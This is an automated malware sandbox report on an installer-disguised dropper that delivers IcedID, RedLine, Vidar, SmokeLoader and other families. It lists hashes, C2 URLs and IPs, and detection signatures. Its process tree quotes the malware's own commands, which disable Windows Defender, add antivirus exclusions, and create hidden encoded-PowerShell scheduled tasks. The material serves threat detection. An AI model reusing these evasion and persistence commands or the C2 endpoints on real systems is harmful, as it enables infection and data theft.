icedid | 56a461a6cc8ad9c10cdc1d19a12d5deceb9ebefb0c871a3fc2eb83c466947a11

Target

setup_x86_x64_install.exe
Size

4.0MB
MD5

73491325fde5366b31c09da701d07dd6
SHA1

a4e1ada57e590c2df30fc26fad5f3ca57ad922b1
SHA256

56a461a6cc8ad9c10cdc1d19a12d5deceb9ebefb0c871a3fc2eb83c466947a11
SHA512

28b5008c542e9c486529934f74774d6d2de4b98531483b24c3c7cf82bf2214b959a1feb0085014026dd278d2a18ac6ae8a0e5a7ebb36be28abf6dccbf2d38e88

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

http://shellloader.com/welcome

Extracted

Family

vidar

Version

40.7

Botnet

706

https://petrenko96.tumblr.com/

Attributes

profile_id
706

Extracted

Family

redline

Botnet

janesam

65.108.20.195:6774

Extracted

Family

smokeloader

Version

2020

http://varmisende.com/upload/

http://fernandomayol.com/upload/

http://nextlytm.com/upload/

http://people4jan.com/upload/

http://asfaltwerk.com/upload/

rc4.i32

Extracted

Family

redline

Botnet

199qwe

185.215.113.104:18754

Extracted

Family

icedid

Campaign

3162718704

Signatures

IcedID, BokBot
IcedID is a banking trojan capable of stealing credentials.
trojan banker icedid

Process spawned unexpected child process 4 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

description	pid	pid_target	Process	procid_target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3788	2080	rundll32.exe	2
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	7200	2080	rundll32.exe	2
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	8248	2080	rundll32.exe	2
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	9064	2080	rundll32.exe	2

RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine Payload 5 IoCs

resource	yara_rule
behavioral8/memory/492-239-0x0000000004A80000-0x0000000004A9D000-memory.dmp	family_redline
behavioral8/memory/4708-303-0x0000000000400000-0x0000000000422000-memory.dmp	family_redline
behavioral8/memory/4708-304-0x000000000041C5DA-mapping.dmp	family_redline
behavioral8/memory/2804-345-0x000000000041C5E2-mapping.dmp	family_redline
behavioral8/memory/3172-563-0x000000000041C5DE-mapping.dmp	family_redline

SmokeLoader
Modular backdoor trojan in use since 2014.
trojan backdoor smokeloader
Socelars
Socelars is an infostealer targeting browser cookies and credit card credentials.
stealer socelars

Socelars Payload 2 IoCs

resource	yara_rule
behavioral8/files/0x000400000001ab11-144.dat	family_socelars
behavioral8/files/0x000400000001ab11-173.dat	family_socelars

Tofsee
Backdoor/botnet which carries out malicious activities based on commands from a C2 server.
trojan tofsee
Vidar
Vidar is an infostealer based on Arkei stealer.
stealer vidar
suricata: ET MALWARE JS/Nemucod requesting EXE payload 2016-02-01
suricata: ET MALWARE JS/Nemucod requesting EXE payload 2016-02-01
suricata
suricata: ET MALWARE JS/Nemucod.M.gen downloading EXE payload
suricata: ET MALWARE JS/Nemucod.M.gen downloading EXE payload
suricata
suricata: ET MALWARE Observed Win32/Ymacco.AA36 User-Agent
suricata: ET MALWARE Observed Win32/Ymacco.AA36 User-Agent
suricata
suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt)
suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt)
suricata
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
suricata
suricata: ET MALWARE Vidar/Arkei Stealer Client Data Upload
suricata: ET MALWARE Vidar/Arkei Stealer Client Data Upload
suricata
suricata: ET MALWARE Vidar/Arkei/Megumin/Oski Stealer Data Exfil
suricata: ET MALWARE Vidar/Arkei/Megumin/Oski Stealer Data Exfil
suricata
suricata: ET MALWARE Win32/IcedID Request Cookie
suricata: ET MALWARE Win32/IcedID Request Cookie
suricata
suricata: ET MALWARE Win32/Tnega Activity (GET)
suricata: ET MALWARE Win32/Tnega Activity (GET)
suricata

Vidar Stealer 2 IoCs

stealer

resource	yara_rule
behavioral8/memory/1952-224-0x0000000000A60000-0x0000000000B34000-memory.dmp	family_vidar
behavioral8/memory/1952-226-0x0000000000400000-0x00000000004D7000-memory.dmp	family_vidar

ASPack v2.12-2.42 6 IoCs

Detects executables packed with ASPack v2.12-2.42

aspackv2

resource	yara_rule
behavioral8/files/0x000400000001ab08-124.dat	aspack_v212_v242
behavioral8/files/0x000400000001ab0a-131.dat	aspack_v212_v242
behavioral8/files/0x000400000001ab0a-132.dat	aspack_v212_v242
behavioral8/files/0x000400000001ab08-128.dat	aspack_v212_v242
behavioral8/files/0x000400000001ab07-126.dat	aspack_v212_v242
behavioral8/files/0x000400000001ab07-125.dat	aspack_v212_v242

Creates new service(s) 1 TTPs
persistence

New Service
T1050
Downloads MZ/PE file

Executes dropped EXE 16 IoCs

pid	Process
496	setup_installer.exe
888	setup_install.exe
2728	Sun193fda712d9f1.exe
2672	Sun1917b8fb5f09db8.exe
3820	Sun19e4ade31b2a.exe
3080	Sun19262b9e49ad.exe
1780	Sun1908b94df837b3158.exe
3576	Sun191101c1aaa.exe
3216	Sun19de8ff4b6aefeb8.exe
1488	Sun198361825f4.exe
1952	Sun19eb40faaaa9.exe
2664	Sun1905815e51282417.exe
492	Sun195a1614ec24e6a.exe
3728	Sun1966fb31dd5a07.exe
4140	Sun1966fb31dd5a07.tmp
4512	tbdcivg

Modifies Windows Firewall 1 TTPs
evasion

Modify Existing Service
T1031

Loads dropped DLL 7 IoCs

pid	Process
888	setup_install.exe
888	setup_install.exe
888	setup_install.exe
888	setup_install.exe
888	setup_install.exe
888	setup_install.exe
4140	Sun1966fb31dd5a07.tmp

Themida packer 2 IoCs

Detects Themida, an advanced Windows software protection system.

themida

resource	yara_rule
behavioral8/files/0x000200000001ab47-271.dat	themida
behavioral8/files/0x000200000001ab47-290.dat	themida

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

Looks up external IP address via web service 8 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
107	ip-api.com
220	ipinfo.io
222	ipinfo.io
394	ipinfo.io
395	ipinfo.io
9	ip-api.com
105	ipinfo.io
106	ipinfo.io

Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Program crash 16 IoCs

pid	pid_target	Process	procid_target
5024	3216	WerFault.exe	85
2532	3216	WerFault.exe	85
3944	2004	WerFault.exe	116
4232	3216	WerFault.exe	85
5248	3216	WerFault.exe	85
5676	4876	WerFault.exe	119
5948	4876	WerFault.exe	119
6052	3216	WerFault.exe	85
6084	3608	WerFault.exe	114
1312	4876	WerFault.exe	119
5028	3216	WerFault.exe	85
5472	4876	WerFault.exe	119
4476	4876	WerFault.exe	119
6008	5540	WerFault.exe	132
6132	4876	WerFault.exe	119
2324	4876	WerFault.exe	119

Checks SCSI registry key(s) 3 TTPs 3 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Sun1908b94df837b3158.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Sun1908b94df837b3158.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Sun1908b94df837b3158.exe

Creates scheduled task(s) 1 TTPs 6 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

T1053

pid	Process
7940	schtasks.exe
7792	schtasks.exe
8876	schtasks.exe
7712	schtasks.exe
5168	schtasks.exe
4740	schtasks.exe

Delays execution with timeout.exe 4 IoCs

evasion

pid	Process
5296	timeout.exe
1744	timeout.exe
8928	timeout.exe
8092	timeout.exe

Kills process with taskkill 4 IoCs

evasion

pid	Process
480	taskkill.exe
5432	taskkill.exe
5920	taskkill.exe
8184	taskkill.exe

Script User-Agent 1 IoCs

Uses user-agent string associated with script host/environment.

description	flow	ioc
HTTP User-Agent header	16	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Suspicious behavior: EnumeratesProcesses 4 IoCs

pid	Process
2316	powershell.exe
2316	powershell.exe
1780	Sun1908b94df837b3158.exe
1780	Sun1908b94df837b3158.exe

Suspicious use of AdjustPrivilegeToken 39 IoCs

description	pid	Process
Token: SeCreateTokenPrivilege	3080	Sun19262b9e49ad.exe
Token: SeAssignPrimaryTokenPrivilege	3080	Sun19262b9e49ad.exe
Token: SeLockMemoryPrivilege	3080	Sun19262b9e49ad.exe
Token: SeIncreaseQuotaPrivilege	3080	Sun19262b9e49ad.exe
Token: SeMachineAccountPrivilege	3080	Sun19262b9e49ad.exe
Token: SeTcbPrivilege	3080	Sun19262b9e49ad.exe
Token: SeSecurityPrivilege	3080	Sun19262b9e49ad.exe
Token: SeTakeOwnershipPrivilege	3080	Sun19262b9e49ad.exe
Token: SeLoadDriverPrivilege	3080	Sun19262b9e49ad.exe
Token: SeSystemProfilePrivilege	3080	Sun19262b9e49ad.exe
Token: SeSystemtimePrivilege	3080	Sun19262b9e49ad.exe
Token: SeProfSingleProcessPrivilege	3080	Sun19262b9e49ad.exe
Token: SeIncBasePriorityPrivilege	3080	Sun19262b9e49ad.exe
Token: SeCreatePagefilePrivilege	3080	Sun19262b9e49ad.exe
Token: SeCreatePermanentPrivilege	3080	Sun19262b9e49ad.exe
Token: SeBackupPrivilege	3080	Sun19262b9e49ad.exe
Token: SeRestorePrivilege	3080	Sun19262b9e49ad.exe
Token: SeShutdownPrivilege	3080	Sun19262b9e49ad.exe
Token: SeDebugPrivilege	3080	Sun19262b9e49ad.exe
Token: SeAuditPrivilege	3080	Sun19262b9e49ad.exe
Token: SeSystemEnvironmentPrivilege	3080	Sun19262b9e49ad.exe
Token: SeChangeNotifyPrivilege	3080	Sun19262b9e49ad.exe
Token: SeRemoteShutdownPrivilege	3080	Sun19262b9e49ad.exe
Token: SeUndockPrivilege	3080	Sun19262b9e49ad.exe
Token: SeSyncAgentPrivilege	3080	Sun19262b9e49ad.exe
Token: SeEnableDelegationPrivilege	3080	Sun19262b9e49ad.exe
Token: SeManageVolumePrivilege	3080	Sun19262b9e49ad.exe
Token: SeImpersonatePrivilege	3080	Sun19262b9e49ad.exe
Token: SeCreateGlobalPrivilege	3080	Sun19262b9e49ad.exe
Token: 31	3080	Sun19262b9e49ad.exe
Token: 32	3080	Sun19262b9e49ad.exe
Token: 33	3080	Sun19262b9e49ad.exe
Token: 34	3080	Sun19262b9e49ad.exe
Token: 35	3080	Sun19262b9e49ad.exe
Token: SeDebugPrivilege	3576	Sun191101c1aaa.exe
Token: SeDebugPrivilege	3820	Sun19e4ade31b2a.exe
Token: SeDebugPrivilege	492	Sun195a1614ec24e6a.exe
Token: SeDebugPrivilege	2316	powershell.exe
Token: SeDebugPrivilege	1488	Sun198361825f4.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2844 wrote to memory of 496	2844	setup_x86_x64_install.exe	69
PID 2844 wrote to memory of 496	2844	setup_x86_x64_install.exe	69
PID 2844 wrote to memory of 496	2844	setup_x86_x64_install.exe	69
PID 496 wrote to memory of 888	496	setup_installer.exe	70
PID 496 wrote to memory of 888	496	setup_installer.exe	70
PID 496 wrote to memory of 888	496	setup_installer.exe	70
PID 888 wrote to memory of 1744	888	setup_install.exe	73
PID 888 wrote to memory of 1744	888	setup_install.exe	73
PID 888 wrote to memory of 1744	888	setup_install.exe	73
PID 888 wrote to memory of 3168	888	setup_install.exe	74
PID 888 wrote to memory of 3168	888	setup_install.exe	74
PID 888 wrote to memory of 3168	888	setup_install.exe	74
PID 888 wrote to memory of 2656	888	setup_install.exe	99
PID 888 wrote to memory of 2656	888	setup_install.exe	99
PID 888 wrote to memory of 2656	888	setup_install.exe	99
PID 888 wrote to memory of 2540	888	setup_install.exe	98
PID 888 wrote to memory of 2540	888	setup_install.exe	98
PID 888 wrote to memory of 2540	888	setup_install.exe	98
PID 888 wrote to memory of 2524	888	setup_install.exe	97
PID 888 wrote to memory of 2524	888	setup_install.exe	97
PID 888 wrote to memory of 2524	888	setup_install.exe	97
PID 888 wrote to memory of 1924	888	setup_install.exe	75
PID 888 wrote to memory of 1924	888	setup_install.exe	75
PID 888 wrote to memory of 1924	888	setup_install.exe	75
PID 888 wrote to memory of 2084	888	setup_install.exe	76
PID 888 wrote to memory of 2084	888	setup_install.exe	76
PID 888 wrote to memory of 2084	888	setup_install.exe	76
PID 888 wrote to memory of 2264	888	setup_install.exe	77
PID 888 wrote to memory of 2264	888	setup_install.exe	77
PID 888 wrote to memory of 2264	888	setup_install.exe	77
PID 1744 wrote to memory of 2316	1744	cmd.exe	78
PID 1744 wrote to memory of 2316	1744	cmd.exe	78
PID 1744 wrote to memory of 2316	1744	cmd.exe	78
PID 888 wrote to memory of 2496	888	setup_install.exe	79
PID 888 wrote to memory of 2496	888	setup_install.exe	79
PID 888 wrote to memory of 2496	888	setup_install.exe	79
PID 888 wrote to memory of 2604	888	setup_install.exe	80
PID 888 wrote to memory of 2604	888	setup_install.exe	80
PID 888 wrote to memory of 2604	888	setup_install.exe	80
PID 3168 wrote to memory of 2672	3168	cmd.exe	96
PID 3168 wrote to memory of 2672	3168	cmd.exe	96
PID 3168 wrote to memory of 2672	3168	cmd.exe	96
PID 2540 wrote to memory of 2728	2540	cmd.exe	81
PID 2540 wrote to memory of 2728	2540	cmd.exe	81
PID 888 wrote to memory of 3044	888	setup_install.exe	95
PID 888 wrote to memory of 3044	888	setup_install.exe	95
PID 888 wrote to memory of 3044	888	setup_install.exe	95
PID 2524 wrote to memory of 3820	2524	cmd.exe	94
PID 2524 wrote to memory of 3820	2524	cmd.exe	94
PID 888 wrote to memory of 3716	888	setup_install.exe	83
PID 888 wrote to memory of 3716	888	setup_install.exe	83
PID 888 wrote to memory of 3716	888	setup_install.exe	83
PID 2656 wrote to memory of 3080	2656	cmd.exe	93
PID 2656 wrote to memory of 3080	2656	cmd.exe	93
PID 2656 wrote to memory of 3080	2656	cmd.exe	93
PID 888 wrote to memory of 3612	888	setup_install.exe	82
PID 888 wrote to memory of 3612	888	setup_install.exe	82
PID 888 wrote to memory of 3612	888	setup_install.exe	82
PID 1924 wrote to memory of 1780	1924	cmd.exe	84
PID 1924 wrote to memory of 1780	1924	cmd.exe	84
PID 1924 wrote to memory of 1780	1924	cmd.exe	84
PID 2264 wrote to memory of 3576	2264	cmd.exe	92
PID 2264 wrote to memory of 3576	2264	cmd.exe	92
PID 2084 wrote to memory of 3216	2084	cmd.exe	85

C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe
"C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:2844
- C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
  "C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:496
- - C:\Users\Admin\AppData\Local\Temp\7zS0F18D891\setup_install.exe
    "C:\Users\Admin\AppData\Local\Temp\7zS0F18D891\setup_install.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Suspicious use of WriteProcessMemory
    PID:888
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:1744
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
        5⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2316
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Sun1917b8fb5f09db8.exe
      4⤵
      Suspicious use of WriteProcessMemory
      PID:3168
    - - C:\Users\Admin\AppData\Local\Temp\7zS0F18D891\Sun1917b8fb5f09db8.exe
        
        Sun1917b8fb5f09db8.exe
        5⤵
        Executes dropped EXE
        
        PID:2672
      - C:\Users\Admin\Documents\PslJczYjJlQpjUZyGbAAskGj.exe
        
        "C:\Users\Admin\Documents\PslJczYjJlQpjUZyGbAAskGj.exe"
        6⤵
        
        PID:5084
      - C:\Users\Admin\Documents\PDuiq4gmzLEiKPgxdmRSneVd.exe
        
        "C:\Users\Admin\Documents\PDuiq4gmzLEiKPgxdmRSneVd.exe"
        6⤵
        
        PID:4752
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c taskkill /im PDuiq4gmzLEiKPgxdmRSneVd.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Documents\PDuiq4gmzLEiKPgxdmRSneVd.exe" & del C:\ProgramData\*.dll & exit
        7⤵
        
        PID:368
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /im PDuiq4gmzLEiKPgxdmRSneVd.exe /f
        8⤵
        Kills process with taskkill
        
        PID:8184
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 6
        8⤵
        Delays execution with timeout.exe
        
        PID:8092
      - C:\Users\Admin\Documents\p6JUYGrMnQGrQREFS3zS3pB5.exe
        
        "C:\Users\Admin\Documents\p6JUYGrMnQGrQREFS3zS3pB5.exe"
        6⤵
        
        PID:6052
      - C:\Users\Admin\Documents\Ogpnl9tl5rggipiaQh9ZC8Uf.exe
        
        "C:\Users\Admin\Documents\Ogpnl9tl5rggipiaQh9ZC8Uf.exe"
        6⤵
        
        PID:5008
        
        C:\Users\Admin\Documents\qT3dWYBP7ZsuOrwW4ZcUbjl6.exe
        
        "C:\Users\Admin\Documents\qT3dWYBP7ZsuOrwW4ZcUbjl6.exe"
        7⤵
        
        PID:992
        
        C:\Users\Admin\Documents\5eklMaeiwiJ8qA0cSyvHdLam.exe
        
        "C:\Users\Admin\Documents\5eklMaeiwiJ8qA0cSyvHdLam.exe"
        8⤵
        
        PID:7264
        
        C:\Users\Admin\Documents\1jSXHtRspEmImioXIR1Nsnt3.exe
        
        "C:\Users\Admin\Documents\1jSXHtRspEmImioXIR1Nsnt3.exe"
        8⤵
        
        PID:8384
        
        C:\Users\Admin\AppData\Local\Temp\7zSD2B4.tmp\Install.exe
        
        .\Install.exe
        9⤵
        
        PID:8460
        
        C:\Users\Admin\AppData\Local\Temp\7zSD5F0.tmp\Install.exe
        
        .\Install.exe /S /site_id "668658"
        10⤵
        
        PID:8668
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True" &
        11⤵
        
        PID:5460
        
        C:\Windows\SysWOW64\forfiles.exe
        
        forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True"
        12⤵
        
        PID:8608
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True
        13⤵
        
        PID:5876
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True
        14⤵
        
        PID:4852
        
        C:\Windows\SysWOW64\Wbem\WMIC.exe
        
        "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True
        15⤵
        
        PID:8840
        
        C:\Windows\SysWOW64\forfiles.exe
        
        "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
        11⤵
        
        PID:7352
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
        12⤵
        
        PID:7448
        
        \??\c:\windows\SysWOW64\reg.exe
        
        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
        13⤵
        
        PID:7336
        
        \??\c:\windows\SysWOW64\reg.exe
        
        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
        13⤵
        
        PID:8968
        
        C:\Windows\SysWOW64\forfiles.exe
        
        "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
        11⤵
        
        PID:8660
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
        12⤵
        
        PID:5144
        
        \??\c:\windows\SysWOW64\reg.exe
        
        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
        13⤵
        
        PID:8664
        
        \??\c:\windows\SysWOW64\reg.exe
        
        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
        13⤵
        
        PID:8164
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /CREATE /TN "gDvRAYqwx" /SC once /ST 01:38:16 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
        11⤵
        Creates scheduled task(s)
        
        PID:8876
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /run /I /tn "gDvRAYqwx"
        11⤵
        
        PID:6444
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /DELETE /F /TN "gDvRAYqwx"
        11⤵
        
        PID:4836
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /CREATE /TN "bRciptYQhTCMvEFWGJ" /SC once /ST 05:02:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\nitzTrLPrXGkZCFFk\iXkrQovqyvDrylo\UlmJZvC.exe\" W8 /site_id 668658 /S" /V1 /F
        11⤵
        Creates scheduled task(s)
        
        PID:7712
        
        C:\Users\Admin\Documents\dMQqggMBgWGB3nqixWwIZCYg.exe
        
        "C:\Users\Admin\Documents\dMQqggMBgWGB3nqixWwIZCYg.exe" /mixtwo
        8⤵
        
        PID:8412
        
        C:\Users\Admin\Documents\Ag7A_AtihJ2nuLG7Is7w0TaX.exe
        
        "C:\Users\Admin\Documents\Ag7A_AtihJ2nuLG7Is7w0TaX.exe"
        8⤵
        
        PID:8568
        
        C:\Users\Admin\Documents\2b5ESjxojUjgrf8pJ070uOyh.exe
        
        "C:\Users\Admin\Documents\2b5ESjxojUjgrf8pJ070uOyh.exe"
        8⤵
        
        PID:8960
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST
        7⤵
        Creates scheduled task(s)
        
        PID:7940
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST
        7⤵
        Creates scheduled task(s)
        
        PID:7792
      - C:\Users\Admin\Documents\DxcroK8utvjbxuK1Hb7LordR.exe
        
        "C:\Users\Admin\Documents\DxcroK8utvjbxuK1Hb7LordR.exe"
        6⤵
        
        PID:4804
        
        C:\Users\Admin\Documents\DxcroK8utvjbxuK1Hb7LordR.exe
        
        C:\Users\Admin\Documents\DxcroK8utvjbxuK1Hb7LordR.exe
        7⤵
        
        PID:6408
        
        C:\Users\Admin\Documents\DxcroK8utvjbxuK1Hb7LordR.exe
        
        C:\Users\Admin\Documents\DxcroK8utvjbxuK1Hb7LordR.exe
        7⤵
        
        PID:6524
      - C:\Users\Admin\Documents\kOeOtSt5c8Qw0FDcW4vfg0H3.exe
        
        "C:\Users\Admin\Documents\kOeOtSt5c8Qw0FDcW4vfg0H3.exe"
        6⤵
        
        PID:4516
      - C:\Users\Admin\Documents\1WZqVTq8Kj3_Wnml2CQEo7jK.exe
        
        "C:\Users\Admin\Documents\1WZqVTq8Kj3_Wnml2CQEo7jK.exe"
        6⤵
        
        PID:4996
        
        C:\Users\Admin\Documents\1WZqVTq8Kj3_Wnml2CQEo7jK.exe
        
        C:\Users\Admin\Documents\1WZqVTq8Kj3_Wnml2CQEo7jK.exe
        7⤵
        
        PID:6568
        
        C:\Users\Admin\Documents\1WZqVTq8Kj3_Wnml2CQEo7jK.exe
        
        C:\Users\Admin\Documents\1WZqVTq8Kj3_Wnml2CQEo7jK.exe
        7⤵
        
        PID:6688
      - C:\Users\Admin\Documents\4SlzoiLaEAsBFGgXQUJKB71q.exe
        
        "C:\Users\Admin\Documents\4SlzoiLaEAsBFGgXQUJKB71q.exe"
        6⤵
        
        PID:3052
        
        C:\Users\Admin\Documents\4SlzoiLaEAsBFGgXQUJKB71q.exe
        
        "C:\Users\Admin\Documents\4SlzoiLaEAsBFGgXQUJKB71q.exe"
        7⤵
        
        PID:6912
      - C:\Users\Admin\Documents\5ySJqX_HHYl1iMiEZrkOBCIe.exe
        
        "C:\Users\Admin\Documents\5ySJqX_HHYl1iMiEZrkOBCIe.exe"
        6⤵
        
        PID:5572
      - C:\Users\Admin\Documents\mpiMFXwblm9P_5A83ELlLdp7.exe
        
        "C:\Users\Admin\Documents\mpiMFXwblm9P_5A83ELlLdp7.exe"
        6⤵
        
        PID:6020
      - C:\Users\Admin\Documents\ZtEbljXzgi682pr2t10pm91X.exe
        
        "C:\Users\Admin\Documents\ZtEbljXzgi682pr2t10pm91X.exe"
        6⤵
        
        PID:5240
      - C:\Users\Admin\Documents\O1SeI7RROXz89qLfm6i3dEdL.exe
        
        "C:\Users\Admin\Documents\O1SeI7RROXz89qLfm6i3dEdL.exe"
        6⤵
        
        PID:6188
        
        C:\Program Files (x86)\Company\NewProduct\cm3.exe
        
        "C:\Program Files (x86)\Company\NewProduct\cm3.exe"
        7⤵
        
        PID:1848
        
        C:\Program Files (x86)\Company\NewProduct\inst001.exe
        
        "C:\Program Files (x86)\Company\NewProduct\inst001.exe"
        7⤵
        
        PID:6108
        
        C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe
        
        "C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe"
        7⤵
        
        PID:5156
      - C:\Users\Admin\Documents\rbcFPFwtfjtRdNsYtQOaAmG6.exe
        
        "C:\Users\Admin\Documents\rbcFPFwtfjtRdNsYtQOaAmG6.exe"
        6⤵
        
        PID:6264
        
        C:\Windows\SysWOW64\cmd.exe
        
